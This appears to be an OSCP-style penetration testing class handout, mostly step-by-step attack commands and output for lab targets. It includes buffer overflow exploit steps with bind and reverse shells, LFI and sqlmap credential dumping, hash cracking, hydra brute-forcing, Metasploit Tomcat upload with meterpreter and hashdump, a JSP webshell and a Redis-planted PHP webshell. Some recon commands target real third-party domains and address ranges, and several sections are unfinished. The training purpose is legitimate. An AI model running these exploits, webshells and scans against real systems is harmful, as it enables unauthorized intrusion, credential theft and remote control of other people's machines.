Untitled

OSCP Prep class


Day 1: Exploit Research
http://www.securitytube.net/groups?operation=view&groupId=7

Day 2: Python Hacking
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (videos 1-10 if you are a complete beginner)
https://www.youtube.com/playlist?list=PL1A2CSdiySGLtKwqBnqj9BON6QQjWkP4n (entire playlist)

                            #################################
----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
                            #################################


---------------------------Type This-----------------------------------
cd /home/strategicsec/toolz

wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl

perl blindcrawl.pl -d motorola.com
-----------------------------------------------------------------------


-- Take each IP address and look ip up here:
http://www.networksolutions.com/whois/index.jsp


Zone Transfer fails on most domains, but here is an example of one that works:
---------------------------Type This-----------------------------------
dig axfr heartinternet.co.uk  @ns.heartinternet.co.uk


cd ~/toolz/

wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c

gcc ipcrawl.c -o ipcrawl

chmod 777 ipcrawl

./ipcrawl 148.87.1.1 148.87.1.254


sudo nmap -sL 148.87.1.0-255
     strategicsec


sudo nmap -sL 148.87.1.0-255 | grep oracle
     strategicsec
-----------------------------------------------------------------------


########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------
sudo nmap -sP 157.166.226.*
     strategicsec

    -if -SP yields no results try:
sudo nmap -sL 157.166.226.*
     strategicsec

    -Look for hostnames:
sudo nmap -sL 157.166.226.* | grep com
     strategicsec


- Port Scan
What's where?
------------
sudo nmap -sS 162.243.126.247
     strategicsec


- Bannergrab/Version Query
What versions of software are running
-------------------------------------
sudo nmap -sV 162.243.126.247
     strategicsec


- Vulnerability Research
Lookup the banner versions for public exploits
----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/


##############################
# Scanning Process to follow #
##############################
Step 1: Ping Sweep
------------------
nmap -sP <IP-ADDRESS-RANGE>
nmap -sL <IP-ADDRESS-RANGE>


Step 2: Port Scan
-----------------
nmap -sS <IP-ADDRESS>


Step 3: Bannergrab
------------------
nmap -sV <IP-ADDRESS>
nmap -sV -p- <IP-ADDRESS>
	|
	----> Vulnerability Research


Step 4: Vulnerability Scan the webservers
-----------------------------------------
git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h <IP-ADDRESS>


Step 5: Directory Bruteforce
--------------------
git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

./dirb

./dirb http://<IP-ADDRESS> wordlists/big.txt


Step 6: Bruteforce any services you find
----------------------------------------
 root@kali:~# hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
 root@kali:~# hydra -l user -P passlist.txt ftp://<IP-ADDRESS


                            ##############################
----------- ############### # Day 2: Stack Overflow Labs # ############### -----------
                            ##############################


#######################################
# Download the class virtual machines #
#######################################

You can download the Exploit Dev VMs from the links below:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
user:	Administrator
pass: 	strategicsec


https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
user:	Administrator
pass: 	strategicsec


https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
    username: workshop
    password: password


Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:
https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip


#########################################
# Download this file on your windows VM #
#########################################
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip


#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

- Extract this zip file to your Desktop

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:
nc localhost 9999

- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.


------------------------------

cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc

vi vulnserv.rb    (paste the code into this file)


cd ~/toolz/metasploit

./msfconsole


use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.88.129
set RPORT 9999
exploit

---------------------------------------------------------------------
Day 1 Challenge:

Write an exploit for FreeFloat FTP - make sure that it is broken up into multiple scripts like the vulnserver exploit is.
https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip


Reference scripts for FreeFloat FTP:
https://www.exploit-db.com/exploits/40711/
https://www.exploit-db.com/exploits/40681/
https://www.exploit-db.com/exploits/40677/
https://www.exploit-db.com/exploits/40674/
https://www.exploit-db.com/exploits/40673/
https://www.exploit-db.com/exploits/40672/
https://www.exploit-db.com/exploits/24479/


##################
# Linux Exploits #
##################

The target virtual machine for these labs can be downloaded from here:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
root: exploitlab
user: exploitlab
pass: exploitlab


The attack scripts can be downloaded from here:
https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
https://s3.amazonaws.com/secureninja/files/dproxy.zip
https://s3.amazonaws.com/secureninja/files/asterisk.zip


######################################
# Lab 1: Simple Linux Stack Overflow #
######################################
Login to the asterisk VM with the username/password of (exploitlab/exploitlab)

---------------------------Type This-----------------------------------

cat victim1.c
gcc victim1.c -o victim1
./victim AAAAAAAAAAAAAAAAAAA
./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


gdb -core core.xxxx
info registers
x/64x $esp
quit


/usr/local/sbin/peercast

    -open peercast1.py on the XP attack-
python peercast1.py | nc asterisk-vm-ip 7144

gdb -core core.xxxx
info registers
x/64x $esp
quit


/usr/local/sbin/peercast

    -open peercast2.py-
python peercast2.py | nc asterisk-vm-ip 7144

gdb -core core.xxxx
info registers
x/64x $esp
quit


    - SSH into the Ubuntu Host (strategicsec:strategicsec) -
cd /home/strategicsec/toolz/metasploit/tools/exploit

    Now we will run the pattern offset with ruby:

ruby pattern_offset.rb 42306142

    and

ruby pattern_offset.rb 61423161
-----------------------------------------------------------------------

    Distance to EIP is 780
    Relative position of ESP 784

Now to find a good JMP ESP address with msfelfscan

---------------------------Type This-----------------------------------

cd /home/strategicsec/toolz/metasploit/
./msfelfscan -j ESP binaries/peercast_binary
-----------------------------------------------------------------------

    0x0808fb57   jmp esp <----- we will use this one!
    0x0808fcc7   jmp esp
    0x0808ffff   jmp esp
    0x08090057   jmp esp <----- we can't use this one.
    0x080901df   jmp esp


Now open and edit peercast3.py in notepad++ on our XP Host machine.
    pad_lenth = the distance to EIP
    ret_address =  the jmp esp we are using

---------------------------Type This-----------------------------------

python peercast3.py | nc asterisk-vm-ip 7144

gdb -core core.xxxx
info registers
x/64x $eip
x/10i $eip
quit
-----------------------------------------------------------------------

Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode

    Linux IA32 Reverse Shell
    LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
    LPORT (Listening Port) – chose a port to run your listener on
    Encoder: Alpha2

---------------------------Type This-----------------------------------

nc -l -p 4321
python peercast4.py | nc asterisk-vm-ip 7144
-----------------------------------------------------------------------


                            ###########################
----------- ############### # Day 3: Attack Lab Hosts # ############### -----------
                            ###########################


#########################
# Class Virtual Machine #
#########################


Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:

https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts


Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.


To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
https://54.245.178.32/?src=connect


Accept the security exception and enter one of the following user names:

username: labuser001
username: labuser002
username: labuser003
username: labuser004
username: labuser005
username: labuser006
username: labuser007
username: labuser008
username: labuser009
username: labuser010
username: labuser011
username: labuser012
username: labuser013
username: labuser014
username: labuser015
username: labuser016
username: labuser017
username: labuser018
username: labuser019
username: labuser020

----------------------------------------------------------------------------------------------------------------------------------------

Mr. McCray will provide you with the password for the usernames above once the training session starts.


The target network range is:
172.31.2.0/24


You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.


----------------------------------------------------------------------------------------------------------------------------------------
Some tools to install:
---------------------------Type This-----------------------------------
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
sudo cp propecia /bin
-----------------------------------------------------------------------


Step 1: Portscan the server
---------------------------Type This-----------------------------------
sudo nmap -sS 172.31.2.139
-----------------------------------------------------------------------

Step 2: Version scan the server
---------------------------Type This-----------------------------------
sudo nmap -sV -p22,80 172.31.2.139
-----------------------------------------------------------------------


Step 3: Vulnerability scan the webserver
---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.139
-----------------------------------------------------------------------


Step 4: Directory brute-force the webserver
---------------------------Type This-----------------------------------
cd ~/toolz

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.139 wordlists/big.txt
-----------------------------------------------------------------------


----------------------------------------------------------------------------------------------------------------------------------------------


Attack steps:
-------------


Step 1: Ping sweep the target network
-------------------------------------


---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------

Found 4 hosts:
172.31.2.47
172.31.2.47
172.31.2.157
172.31.2.217


Step 2: Port scan target system
-------------------------------


---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.47
-----------------------------------------------------------------------


PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp  open     http    Apache httpd 2.2.22 ((Ubuntu))
514/tcp filtered shell
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Step 3: Vulnerability Scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.47
-----------------------------------------------------------------------


Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------


---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.47 -v | grep -v "404 Not Found"
-----------------------------------------------------------------------


Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself


http://172.31.2.47/test
http://172.31.2.47/test.php (got the following error message)
    'file' parameter is empty. Please provide file path in 'file' parameter

Figured this was a Local File Include (LFI) so I tried:
    http://172.31.2.47/test.php?file=/etc/passwd
    http://172.31.2.47/test.php?file=/etc/passwd%00

None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)
---------------------------Type This-----------------------------------
curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php
-----------------------------------------------------------------------


http://172.31.2.47/a
http://172.31.2.47/b
http://172.31.2.47/c  (a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"

So let's try that POST request with curl to pull down the c.php config file.

---------------------------Type This-----------------------------------
curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php
curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php
curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php
-----------------------------------------------------------------------

<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>


---------------------------Type This-----------------------------------
ssh -l billu 172.31.2.47
    b0x_billu
-----------------------------------------------------------------------


http://172.31.2.47/phpmyadmin
http://172.31.2.47/phpMyAdmin
http://172.31.2.47/pma
http://172.31.2.47/phpmy


Then I Googled config file name for phpmyadmin (config.inc.php)

---------------------------Type This-----------------------------------
curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php
-----------------------------------------------------------------------
<?php

/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;


---------------------------Type This-----------------------------------
ssh -l root 172.31.2.47
    roottoor
-----------------------------------------------------------------------


---------------------------------------------------------------------------------------------------------------------------------------------------------

Attack steps:
-------------


Step 1: Ping sweep the target network
-------------------------------------


---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------


- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238


Step 2: Port scan target system
-------------------------------


---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------


-------------Scan Results--------------------------------------------
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.7 ((Ubuntu))
514/tcp  filtered shell
1037/tcp filtered ams
6667/tcp open     irc     ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------


Step 3: Vulnerability Scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------


Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------


---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.64 -v
-----------------------------------------------------------------------


Step 5: Browse the web site to look for clues
---------------------------------------------
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself


..... really didn't get much from here so we just opened the web page in a browser
http://172.31.2.64/

.....browsed to the webpage and saw that it pointed to:
http://172.31.2.64/jabc

....clicked on documentation link and found hidden text that pointed to here:
http://172.31.2.64/jabcd0cs/

....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
https://www.exploit-db.com/exploits/32075/

Tried the sql injection described in exploit-db:
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9


Tried to run sqlmap against the target


---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------


FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net


---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------

    username:   webmin
    hash:       b78aae356709f8c31118ea613980954b

https://hashkiller.co.uk/md5-decrypter.aspx

    hash:       b78aae356709f8c31118ea613980954b
    pass:       webmin1980


ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.


---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
    webmin1980

id

cat /etc/*release
-----------------------------------------------------------------------


....tired of not having a real command shell...


---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'


cd /tmp

pwd


cat >> exploit.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...


---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom
-----------------------------------------------------------------------


------------exploit failed, damn let's try another one ---------


---------------------------Type This-----------------------------------
cat >> exploit2.c << out

**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/


out


gcc -o boom2 exploit2.c

./boom2

id


......YEAH - do the happy dance!!!!


---- Previous class attack process -------


#########################
# Building a quick list #
#########################

---------------------------Type This-----------------------------------

cd ~
echo bob >> list.txt
echo jim >> list.txt
echo joe >> list.txt
echo tim >> list.txt
echo admin >> list.txt
echo hello >> list.txt
echo rob >> list.txt
echo test >> list.txt
echo aaaaaa >> list.txt
echo larry >> list.txt
echo mario >> list.txt
echo jason >> list.txt
echo john >> list.txt
-----------------------------------------------------------------------


###########################################################
# Let's start with some basic scanning of the lab network #
###########################################################

---------------------------Type This-----------------------------------

infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------

Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST
Nmap scan report for 172.31.2.24
Host is up (0.046s latency).
Nmap scan report for 172.31.2.47
Host is up (0.045s latency).
Nmap scan report for 172.31.2.64
Host is up (0.037s latency).
Nmap scan report for 172.31.2.86
Host is up (0.040s latency).
Nmap scan report for 172.31.2.117
Host is up (0.038s latency).
Nmap scan report for 172.31.2.139
Host is up (0.037s latency).
Nmap scan report for 172.31.2.157
Host is up (0.036s latency).
Nmap scan report for 172.31.2.217
Host is up (0.047s latency).
Nmap scan report for 172.31.2.238
Host is up (0.036s latency).
Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds


---------------------------Type This-----------------------------------

infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24
-----------------------------------------------------------------------

[sudo] password for infosecaddicts:

Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST
Nmap scan report for 172.31.2.24
Host is up (1.8s latency).
Not shown: 989 closed ports
PORT     STATE    SERVICE
25/tcp   open     smtp
80/tcp   open     http
111/tcp  open     rpcbind
139/tcp  open     netbios-ssn
445/tcp  open     microsoft-ds
514/tcp  filtered shell
1322/tcp open     novation
2049/tcp open     nfs
8080/tcp open     http-proxy
8081/tcp open     blackice-icecap
9000/tcp open     cslistener

Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds


---------------------------Type This-----------------------------------

infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24
-----------------------------------------------------------------------

Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST
Nmap scan report for 172.31.2.24
Host is up (0.031s latency).
PORT     STATE SERVICE     VERSION
25/tcp   open  ftp         vsftpd 3.0.2
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1322/tcp open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open  http        Apache httpd 2.4.7 ((Ubuntu))
9000/tcp open  http        Jetty winstone-2.9
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds


###########################
# Day 1: Attacking Kevgir #
###########################


******** Attacking Kevgir ********
I figured I've give you something fun to play with.


###############
# Using Nikto #
###############

---------------------------Type This-----------------------------------

cd ~/toolz/

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.24

perl nikto.pl -h 172.31.2.24:8080

perl nikto.pl -h 172.31.2.24:8081

perl nikto.pl -h 172.31.2.24:9000

-----------------------------------------------------------------------


####################
# Using Metasploit #
####################

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit

./msfconsole

use auxiliary/scanner/http/http_version

set RHOSTS 172.31.2.24

set RPORT 8080

run


-------------------------------

use auxiliary/scanner/http/tomcat_enum

set RHOSTS 172.31.2.24

set RPORT 8080

run
-----------------------------------------------------------------------


####################
# Attacking Tomcat #
####################

---------------------------Type This-----------------------------------

use auxiliary/scanner/http/http_version

set RHOSTS 172.31.2.24

set RPORT 8080

run


-------------------------------


use auxiliary/scanner/http/tomcat_mgr_login

set USERNAME tomcat

set USERPASS_FILE /home/infosecaddicts/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 172.31.2.24

set RPORT 8080

run


-------------------------------

use exploit/multi/http/tomcat_mgr_upload

set HttpUsername tomcat

set HttpPassword tomcat

set RHOST 172.31.2.24

set RPORT 8080

set PATH /manager/html

set PAYLOAD java/meterpreter/bind_tcp

exploit


run post/linux/gather/checkvm

run post/linux/gather/enum_configs

run post/linux/gather/enum_protections

run post/linux/gather/enum_system

run post/linux/gather/enum_users_history

run post/linux/gather/hashdump

shell

/bin/bash

id

uname -a

dpkg -l

cd /tmp

pwd


cat >> exploit.c << out

**************paste in the content from here *****************
https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c


------ hit enter a few times ------

------ then type 'out' ----- this closes the file handle...


gcc -o boom exploit.c

./boom

id


-----------------------------------------------------------------------

---------------------------Type This-----------------------------------

hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
-----------------------------------------------------------------------


-------------------------------------------index.jsp-------------------------------------------
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>
-------------------------------------------index.jsp-------------------------------------------

***** now pack the webshell *****


---------------------------Type This-----------------------------------

mkdir webshell
cp index.jsp webshell

cd webshell
jar -cvf ../webshell.war *
-----------------------------------------------------------------------


Deploy the WAR file using the built-in deploy option on the manager web-page.
Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
now upload the webshell.war. After uploading, visit page: http://172.31.2.2:8080/webshell/


****** This section isn't finished ******

 ---------------------------Type This-----------------------------------

cd ~/toolz/metasploit

./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war

jar tf ~/bind7777.war
-----------------------------------------------------------------------

****** This section isn't finished ******

Google is your friend hahahahahahahah........


#################
# Attacking FTP #
#################

---------------------------Type This-----------------------------------

sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24

cd ~/toolz/hydra

hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp

ftp
open 172.31.2.24
admin
admin
pwd
ls -lah

ls ../../
-----------------------------------------------------------------------


#################
# Attacking SSH #
#################

---------------------------Type This-----------------------------------

sudo apt-get install -y libssh-dev
     infosecaddicts
cd ~/toolz/hydra
make clean
./configure
make
sudo make install


hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh

ssh -p 1322 admin@172.31.2.24


-------------------------------

cd ~/toolz/metasploit

./msfconsole

use auxiliary/scanner/ssh/ssh_enumusers

set USER_FILE /home/infosecaddicts/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 172.31.2.24

set RPORT 1322

run


use auxiliary/scanner/ssh/ssh_login

set USER_FILE /home/infosecaddicts/list.txt

set PASS_FILE /home/infosecaddicts/list.txt

set STOP_ON_SUCCESS true

set RHOSTS 172.31.2.24

set RPORT 1322

run


sessions -l

sessions -u 1

sessions -i 1

id

-----------------------------------------------------------------------


########################
# Attacking phpMyAdmin #
########################
****** This section isn't finished ******

---------------------------Type This-----------------------------------

hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
-----------------------------------------------------------------------

****** This section isn't finished ******

Google is your friend hahahahahahahah........


---------------------------Type This-----------------------------------

wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py

python pmabf.py http://172.31.2.24 root list.txt        (this gave me the WRONG password)
-----------------------------------------------------------------------


####################
# Attacking Joomla #
####################

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit

./msfconsole

use use auxiliary/scanner/http/joomla_plugins

set RHOSTS 172.31.2.24

set RPORT 8080

run
-----------------------------------------------------------------------


****** This section isn't finished ******
Google is your friend hahahahahahahah........

#####################
# Attacking Jenkins #
#####################


****** This section isn't finished ******
Google is your friend hahahahahahahah........

#################
# Attacking NFS #
#################

---------------------------Type This-----------------------------------

sudo apt install -y rpcbind nfs-common

rpcinfo -s 172.31.2.24

showmount -e 172.31.2.24

sudo /bin/bash

mkdir /tmp/nfs

mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock

ls /tmp/nfs

cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts

umount -l /tmp/nfs

exit

sudo apt-cache search fcrackzip

sudo apt-get install -y fcrackzip

fcrackzip -u backup.tar.bz2.zip

unzip -P aaaaaa backup.tar.bz2.zip

tar jxf backup.tar.bz2
-----------------------------------------------------------------------


###################
# Attacking Redis #
###################

---------------------------Type This-----------------------------------

sudo nmap -p 6379 --script=redis-info 172.31.2.24
    infosecaddicts

sudo apt-get install -y redis-tools
    infosecaddicts

redis-cli -h 172.31.2.24

CONFIG SET dir /var/www/html/main

CONFIG GET dir

config set dbfilename boom.php

CONFIG GET dbfilename

SET cmd "<?php system($_GET['joe']); ?>"

BGSAVE

http://172.31.2.24/boom.php

http://172.31.2.24/boom.php?joe=id


(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"


****** This section isn't finished ******
Google is your friend hahahahahahahah........

cd ~/toolz/metasploit

./msfconsole

use auxiliary/scanner/redis/file_upload

set RHOSTS 172.31.2.24

set LocalFile

****** This section isn't finished ******
Google is your friend hahahahahahahah........


sudo nmap -sV -p 3260 172.31.2.217


sudo apt install open-iscsi

sudo iscsiadm -m discovery -t  st -p 172.31.2.217

sudo iscsiadm -m discovery -t  st -p 172.31.2.217:3260

sudo iscsiadm -m node -p 172.31.2.217 --login

sudo /bin/bash

fdisk -l
